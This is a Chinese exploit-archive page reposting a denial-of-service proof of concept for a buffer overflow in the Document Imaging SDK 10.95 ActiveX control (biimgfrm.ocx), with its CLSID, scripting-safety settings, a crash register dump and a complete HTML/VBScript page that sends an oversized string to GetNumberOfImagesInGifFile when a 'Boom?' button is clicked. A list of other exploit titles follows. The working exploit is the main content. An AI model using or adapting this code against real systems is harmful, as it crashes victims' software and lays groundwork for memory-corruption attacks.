手机
当前位置:查字典教程网 >网络安全 >Exploit >Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC
Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC
摘要:SubBoombuff=String(14356,"A")test.GetNumberOfImagesInGifFilebuffEndSub

<!--

Document Imaging SDK Buffer Overflow Vulnerability

DoS Proof of concept

Author: r0ut3r

Mail : writ3r [at] gmail.com

-----------------------------

-Tested on WinXP Pro SP2

Version: 10.95

Vendor : Black Ice Software

Price : $999

File : biimgfrm.ocx

CLSID: {79956462-F148-497F-B247-DF35A095F80B}

DLL Settings:

RegKey Safe for Script: True

RegKey Safe for Init : True

KillBitSet : False

Register:

EIP 7C91B3FB -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

EAX 001919C0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

EBX 41414141

ECX 00004141

EDX 00150168 -> 00000000

EDI 41414141

ESI 001919B8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

EBP 0013EA20 -> 0013EAA4

ESP 0013E804 -> 0000021A

-----------------------------

-->

<object classid='clsid:79956462-F148-497F-B247-DF35A095F80B' id='test'></object>

<script language='vbscript'>

Sub Boom

buff = String(14356, "A")

test.GetNumberOfImagesInGifFile buff

End Sub

</script>

<input type=button onclick=Boom() value='Boom?'>

【Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC】相关文章:

Maian Weblog

Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit

Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit

Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

EO Video 1.36 Local Heap Overflow DOS / PoC

精品推荐
分类导航